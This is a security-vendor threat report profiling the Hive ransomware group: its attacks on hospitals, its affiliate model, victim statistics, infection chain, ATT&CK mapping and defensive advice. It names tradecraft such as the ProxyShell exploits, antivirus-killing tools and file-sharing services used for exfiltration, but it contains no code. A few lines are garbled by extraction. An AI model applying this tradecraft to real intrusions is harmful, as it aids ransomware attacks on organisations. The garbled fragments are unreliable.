# Ransomware Spotlight: Hive **trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-hive** X Hive By Trend Micro Research Hive ransomware is one of the new ransomware families in 2021 that poses significant challenges to enterprises worldwide. We take an indepth look at the ransomware group’s operations and discuss how organizations can bolster their defenses against it. ----- View infographic of "Ransomware Spotlight: Hive" While some [ransomware groups operating as ransomware-as-a-service (RaaS) networks claim to steer clear of targeting specific sectors such](https://www.trendmicro.com/vinfo/us/security/definition/ransomware) as hospitals or other critical industries to avoid causing harm to people, Hive’s attacks against healthcare providers in 2021 showed that [the operators behind it have no regard for such humanitarian considerations. A hospital in Missouri suffered a Hive ransomware attack three](https://healthitsecurity.com/news/hive-ransomware-continues-to-attack-healthcare-providers#:~:text=Hive%20Ransomware%20Group%20Attacks%20Missouri,Louis%20Public%20Radio%20reported.) [weeks after the same group hit the integrated systems of a healthcare provider that affected three hospitals and many outpatient clinics in two](https://www.bleepingcomputer.com/news/security/hive-ransomware-attacks-memorial-health-system-steals-patient-data/) other US states. Hive [ransomware has become one of the most active ransomware families since its discovery in June 2021. To defend](https://www.bleepingcomputer.com/news/security/hive-ransomware-attacks-memorial-health-system-steals-patient-data/) against this threat, it is therefore crucial for companies to be acquainted with the various mechanisms that the infamous ransomware gang uses. ## What do organizations need to know about Hive? [On August 15, 2021, Hive’s ransomware attacks against a non-profit integrated health system severely disrupted the clinical and financial](https://www.bleepingcomputer.com/news/security/hive-ransomware-attacks-memorial-health-system-steals-patient-data/) operations of three hospitals in Ohio and West Virginia. The attack resulted in emergency room diversions and cancelation of urgent surgical cases and radiology examinations. The encryption of files forced the hospital staff to use paper charts. Aside from the three hospitals, the affected non-profit also runs several outpatient service sites and clinics with a combined workforce of 3,000 employees. [Hive operators used double extortion techniques in this attack. Aside from the encryption of data, they also stole patient information that they](https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti) threatened to publish on HiveLeaks, their dedicated leak site. The gang shares the list of victims that have not paid the ransom on their Tor site. [The incident prompted the FBI to issue an alert in late August that detailed Hive ransomware’s indicators of compromise (IOCs) and tactics,](https://www.documentcloud.org/documents/21049431-fbi-flash-hive-ransomware-iocs) techniques, and procedures (TTPs). According to the alert, Hive operators use phishing emails with malicious attachments to gain initial access to the system and Remote Desktop Protocol (RDP) to move laterally once on the network. The motivation of those in the cyber-underground to expand their foothold inevitably leads to the incursion of uncharted paths. In late October 2021, threat researchers discovered that Hive has new malware tools specifically developed to encrypt Linux and FreeBSD systems. The [report notes that Hive is among other ransomware operators that have set their sights on Linux servers. Other notorious ransomware groups](https://www.bleepingcomputer.com/news/security/hive-ransomware-now-encrypts-linux-and-freebsd-systems/) have also been known to create their own Linux encryptors. As enterprises slowly migrate to virtual machines to achieve better device management and optimize the use of resources, targeting virtual machines also makes good business sense for RaaS operators because it enables them to encrypt multiple servers simultaneously with just one command. Researchers pointed out that Hive’s bespoke tool for Linux is not fully functional yet as it still cannot completely encrypt all files when the malware was deployed in an explicit path. However, one can expect Hive to keep refining their Linux encryptors to diversify and fortify its malware tool kit. ----- Ja ua y 0, o e o u ope s a gest ca dea e s su e ed a e a so a e attac e S [ss co](https://www.zdnet.com/article/europes-biggest-car-dealer-hit-with-ransomware-attack/) pa y s a e appea ed as o e o t e victims on HiveLeaks in February. Targeting high-value enterprises has become a trend for ransomware operators as can be gleaned from the profile of the victim that reportedly generated US$3.29 billion in revenues for 2020. ## Overview of Hive’s operations Hive operations are more prolific than their leak site might suggest. HiveLeaks only publishes the list of victims that have not settled the [ransom, so it is tough to determine which — or how many — companies decided to pay the ransom. A report indicates that attack attempts by](https://www.bleepingcomputer.com/news/security/hive-ransomware-enters-big-league-with-hundreds-breached-in-four-months/) Hive affiliates hit an average of three companies per day since the group was first discovered in June 2021. The report also mentioned that security researchers who got access to information directly from the administrator panel of the Hive Tor site discovered that the number of enterprises whose systems had been compromised have reached 355 from September to December 2021. [Intelligence gathered by the researchers further revealed that the founders of the group deliberately put systems in place to achieve as much](https://www.bleepingcomputer.com/news/security/hive-ransomware-enters-big-league-with-hundreds-breached-in-four-months/) ease and transparency as possible particularly in the process of ransomware deployment and negotiations. Researchers also learned that the generation of malware versions by affiliates can be done within 15 minutes, while negotiations are coursed through the Hive ransomware administrators who relay the message to the victims in a chat window that the affiliates can see. Researchers also shared that affiliates can see on the Hive administrator panel how much money was collected, the list of companies that paid, and those whose information was leaked. The group’s emphasis on operational efficiency and transparency is key to enticing new affiliates. It suggests that the group is aiming for sustainability by creating an environment that is conducive to building a bigger and stronger affiliate base. [Of note is that some enterprises complained about the decryption tool that Hive operators provided after settling the ransom. Reports said it](https://www.bleepingcomputer.com/news/security/hive-ransomware-enters-big-league-with-hundreds-breached-in-four-months/) lacked proper functionality and claimed that the Master Boot Records of their virtual machines were corrupted, rendering them incapable of booting. ## Top affected countries and industries This section cites Trend Micro™ Smart Protection Network™ (SPN) data on Hive’s attempts to compromise organizations. Our detections show that Hive ransomware attack attempts against organizations were observed the most in South America, with Argentina receiving the highest number followed by Brazil. The United States takes the third spot, while the rest are spread across Europe, Asia, and the Middle East. Figure 1. 10 countries with the highest number of attack attempts per machine for Hive ransomware (August 1, 2021 to February 28, 2022) _Source: Trend Micro Smart Protection Network_ The energy sector had the highest number of attack attempts at 186; healthcare came in second at 125, followed by the financial sector with 102 detections. ----- Figure 2. 10 industries with the highest number of attack attempts per machine for Hive ransomware (August 1, 2021 to February 28, 2022) _Source: Trend Micro Smart Protection Network_ By breaking down the detections per month, our findings reveal that attack attempts peaked in November 2021 at 429. Hive operators were most active in the fourth quarter of 2021 as detections in December and October were the second and third highest numbers, respectively. Figure 3. Monthly breakdown of detections per machine for Hive ransomware (August 1, 2021 to February 28, 2022) _Source: Trend Micro Smart Protection Network_ ## Targeted regions and sectors according to Hive’s leak site An examination of the information that can be found on HiveLeaks reveals the number of successfully compromised companies that, as of this writing, have declined to pay the ransom. In our monitoring of their leak site from December 1, 2021 to February 28, 2022, attacks were highest in North America at 45.2% followed by Europe at 29% and Latin America at 12.9%. Figure 4. Regional distribution of Hive victims according to the group’s leak site (December 1, 2021 to February 28, 2022) Enterprises appear to be Hive’s preferred targets estimated at almost 40%. Their victims were from a wide range of sectors, with technology at the top of the list having a victim count of 5. The healthcare and transportation sectors follow at 4 victims each. Other affected industries include construction, media and entertainment, professional services, retail, materials, automotive, apparel and fashion. ----- Figure 5. Sector distribution of Hive victims according to the group’s leak site (December 1, 2021 to February 28, 2022) Data observed in the same time frame showed that most of the attacks took place on weekdays as malicious activities on weekends comprise only 6.5%. ## Infection chain and techniques Figure 6. Infection chain of Hive ransomware **Initial Access** Hive operators breach systems through phishing emails with malicious attachments. We also observed Microsoft Exchange as a possible entry point for Hive ransomware based on our detection of the same post-exploitation scripts that can be found in the technique used to exploit [ProxyShell-related vulnerabilities. These vulnerabilities were identified as CVE-2021-31207,](https://www.trendmicro.com/en_us/research/21/k/analyzing-proxyshell-related-incidents-via-trend-micro-managed-x.html) [CVE-2021-34473 and](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34473) [CVE-2021-34523.](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34523) **Execution** [Hive operators attempt to run the persistence technique for a Cobalt Strike beacon that can be used as a C&C method to accomplish lateral](https://www.trendmicro.com/en_us/research/21/g/tracking_cobalt_strike_a_vision_one_investigation.html#:~:text=Cobalt%20Strike%20is%20a%20well,and%20remove%20a%20malware%20infection.) movement once they intrude into the system. Right after the attempt, Hive operators start to unload or uninstall antivirus (AV) products in the [system so they can proceed to the download and execution of hacking tools such as PCHunter,](https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/PUA.Win64.PCHunter.A/) [GMER, and](https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/pua.win32.gmer.a/) [TrojanSpy.DATASPY. They use](https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/trojanspy.ps1.dataspy.a/) [these tools to unload other AV products as a tactic to evade detection. We also observed the presence of WMI used to deploy uninstallation](https://documents.trendmicro.com/assets/wp/wp-understanding-wmi-malware.pdf) scripts and ransomware across the networks for lateral movement. **Defense Evasion, Discovery, and Credential Access** We observed the presence of PCHunter and GMER as their tools to discover and terminate services or processes to disable AV software. We also detected the use of TrojanSpy.DATASPY to gather information in the system such as machines in the network and the presence of [specific AV products. In another attack, the threat actors deployed KillAV to terminate several AV products, also to avoid detection.](https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/trojan.win32.killav.wlde/) ----- **,** The Hive gang uses RDP and WMI to move laterally in the compromised network and deliver the payload remotely. We also detected the use of a [BITSAdmin command for lateral movement. The threat actors also used PsExec to move laterally within the network.](https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/microsoft-discovers-fileless-malware-campaign-dropping-astaroth-info-stealer) **Exfiltration** [Our detections showed that the Hive operators use 7-Zip tool to archive stolen data for exfiltration. Moreover, the gang abuses anonymous file-](https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/major-security-flaws-found-in-7-zip) sharing services such as MEGASync, AnonFiles, SendSpace, and uFile to exfiltrate data. **Impact** The ransomware payload proceeds with the encryption routine upon execution. The ransomware generates a random key that is used to [encrypt based on RTLGenRandom API, which will be initially saved on the device’s memory. The key is then used in what appears to be a](https://docs.microsoft.com/en-us/windows/win32/api/ntsecapi/nf-ntsecapi-rtlgenrandom) custom implementation of the encryption process. [The key also encrypts through RSA via](https://www.britannica.com/topic/RSA-encryption) [GoLang’s implementation of RSA encryption. It accomplishes the RSA encryption through a list of](https://golangdocs.com/rsa-encryption-decryption-in-golang) public keys embedded in the binary. It is then saved as .key. on the encrypted drive. The generated key will then be wiped from memory, leaving the encryption key as the only copy of the key for decryption. ## MITRE tactics and techniques **Initial** **Access** **Execution** **Persistence** **Defense Evasion** **Discovery** **Lateral** **Movement** **Collection** **T1566.001 -** Phishing: Spearphishing attachment _Arrives via_ _phishing_ _emails._ **T1190 -** Exploit public-facing application _Arrives via_ _any the_ _following_ _exploits:•_ _CVE-2021-_ _34473• CVE-_ _2021-_ _34523• CVE-_ _2021-31207_ **T1078 - Valid** accounts _Has been_ _reported to_ _make use of_ _compromised_ _accounts to_ _access_ _victims via_ _RDP_ **T1106 - Native API** _Uses native API to_ _execute various_ _commands /routines_ **T1059.003 - Command** and scripting interpreter: Windows Command Shell _The ransomware_ _accepts various_ _command-line_ _arguments upon_ _execution._ **T1059.001 - Command** and scripting interpreter: PowerShell _Cobalt executes a_ _PowerShell command_ _to run the persistence_ _technique._ **T1053.005 -** Scheduled Task/Job: Scheduled TaskRegisters and _executes malicious_ _tasks_ **T1204 - User** execution _User execution is_ _needed to carry out the_ _payload from the spear_ _phishing_ _link/attachments_ **T1047 - Windows** Management Instrument _Used WMI to deploy_ _uninstallation scripts_ _and ransomware._ **T1053.005 -** Boot or logon autostart execution _Scheduled_ _Task/Job:_ _Scheduled_ _Task_ **T1068** - Exploitation for Privilege Escalation _Makes use_ _of CVE-_ _2021-34523_ _to escalate_ _privilege._ **T1562.001 - Impair** Defenses: Disable or Modify Tools _Uses several tools_ _to disable security_ _related software by_ _terminating them_ **T1083 - File and** directory discovery _Searches for_ _specific files and_ _directories related to_ _its encryption_ **T1018 - Remote** system discovery _Makes use of tools_ _for network scans_ **T1057 - Process** discovery _Discovers certain_ _processes for_ _process termination_ **T1063 - Security** software discovery _Discovers security_ _software for_ _reconnaissance and_ _termination_ **T1049 - System** Network Connections Discovery _Uses_ _TrojanSpy.DATASPY_ _to gather information_ _about the connected_ _machines in the_ _network._ **T1135 - Network** Share Discovery _List all available_ _machines in the_ _network via SMB_ **T1570 -** Lateral tool transfer _Can make use_ _of RDP to_ _transfer the_ _Ransomware_ _or tools within_ _the network_ **T1021.002 -** Remote services: SMB/Windows admin shares _Uses RDP to_ _transfer and_ _execute_ _ransomware_ _payload and_ _other tools._ **T1021.006 -** Remote Services: Windows Remote Management _Uses WMI to_ _execute and_ _deploy_ _uninstallation_ _scripts and the_ _ransomware_ _payload._ **T1005 -** Data from local system _May make_ _use of RDP_ _to manually_ _search for_ _valuable_ _files or_ _information_ **T1560.001 -** Archive Collected Data: Archive via Utility _Uses a tool_ _to archive_ _stolen_ _information_ _for_ _exfiltration_ **Command** **and** **Control** **T1105 -** Ingress Too Transfer _Executes_ _BitsAdmin_ _Command_ _to deliver_ _the_ _ransomwar_ _on other_ _machines in_ _the network_ ----- ## Summary of malware, tools, and exploits used Security teams can watch out for the presence of the following malware tools and exploits that are typically used in Hive attacks: **Initial Access** **Execution** **Discovery** **Lateral Movement** **Defense** **Evasion** **Exfiltration** Phishing emails with malicious attachments Exoitpls: **CVE-2021-** **34473** Pre-auth path confusion vulnerability to bypass access control **CVE-2021-** **34523** Privilege elevation vulnerability in the Exchange PowerShell backend **CVE-2021-** **31207** Post-auth remote code execution via arbitrary file write ## Recommendations **PsExec** 3rd Party Tool to execute process or command-line on a remote computer **WMI** Administration feature that provides a uniform environment to access Windows system components. This was used for remote execution of files for lateral movement. **Cobalt Strike** **TrojanSpy.DATASPY** Trojan that collects AV related processes and services running in the system as well as connected machines within the network **PSExec** Command-line utility built for Windows to allow programs to run on remote machines **RDP** Spread across machines in the network using RDP connection **BitsAdmin** Command-line tool that is used to create download or upload jobs and monitor their progress **WMI** Administration feature that provides a uniform environment to access Windows system components. This was used for remote execution of files for lateral movement. **PCHunter** Third party tool that can be used to disable security tools **GMER** Third party tool that can be used to disable security tools **KillAV** Used to terminate AV processes **7-Zip** A file archiver with a high compression ratio. **MEGASync** Third party cloud storage tool abused for data exfiltration **uFile.io** A free file hosting website where people can upload and share files to other users Abused for data exfiltration **SendSpace** Third party cloud storage tool abused for data exfiltration **AnonFiles** An online file storage provider that provides an anonymous working environment Abused for data exfiltration Despite being relatively new, Hive ransomware has already made its mark as one of the most prolific and aggressive ransomware families today. Our detections of their malicious activities show that their operations are robust, thus providing an incentive for new affiliates to join them. Hive operators are also known to constantly refine and diversify their TTPs, so it is important for companies to stay vigilant and be wellinformed of potential threats. An organization stands a better chance of addressing ransomware threats if they implement strong defenses early on. To protect systems against similar threats, organizations can establish security frameworks that allocate resources systematically for establishing a strong defense strategy against ransomware. Here are some best practices that organizations can consider: **Audit and inventory** Take an inventory of assets and data Identify authorized and unauthorized devices and software Audit event and incident logs **Configure and monitor** ----- a age a d a e a d so t a e co gu at o s Grant admin privileges and access only when necessary to an employee’s role Monitor network ports, protocols, and services Activate security configurations on network infrastructure devices such as firewalls and routers Establish a software allowlist that only executes legitimate applications **Patch and update** Conduct regular vulnerability assessments Perform patching or virtual patching for operating systems and applications Update software and applications to their latest versions **Protect and recover** Implement data protection, backup, and recovery measures Enable multifactor authentication (MFA) **Secure and defend** Employ sandbox analysis to block malicious emails Deploy the latest versions of security solutions to all layers of the system, including email, endpoint, web, and network Detect early signs of an attack such as the presence of suspicious tools in the system Use advanced detection technologies such as those powered by AI and machine learning **Train and test** Regularly train and assess employees on security skills. Conduct red-team exercises and penetration tests. A multilayered approach can help organizations guard possible entry points into their system (endpoint, email, web, and network). Security solutions can detect malicious components and suspicious behavior, which can help protect enterprises. [Trend Micro Vision One™ provides multilayered protection and behavior detection, which helps block questionable behavior and tools](https://www.trendmicro.com/en_us/business/products/detection-response.html) before the ransomware can do any damage. [Trend Micro Cloud One™ Workload Security protects systems against both known and unknown threats that exploit vulnerabilities. This](https://www.trendmicro.com/en_us/business/products/hybrid-cloud/cloud-one-workload-security.html) protection is made possible through techniques such as virtual patching and machine learning. [Trend Micro™ Deep Discovery™ Email Inspector employs custom sandboxing and advanced analysis techniques to effectively block](https://www.trendmicro.com/en_us/business/products/user-protection/sps/email-and-collaboration/email-inspector.html) malicious emails, including phishing emails that can serve as entry points for ransomware. [Trend Micro Apex One™ offers next-level automated threat detection and response against advanced concerns such as fileless threats](https://www.trendmicro.com/en_us/business/products/user-protection/sps/endpoint.html) and ransomware, ensuring the protection of endpoints. ## Indicators of Compromise (IOCs) The IOCs for this article can be found [here. Actual indicators might vary per attack.](https://documents.trendmicro.com/assets/txt/IOCs-Hive-ransomware-93DX2hv.txt) HIDE **Like it? Add this infographic to your site:** 1. Click on the box below. 2. Press Ctrl+A to select all. 3. Press Ctrl+C to copy. 4. Paste the code into your page (Ctrl+V). Image will appear the same size as you see above. -----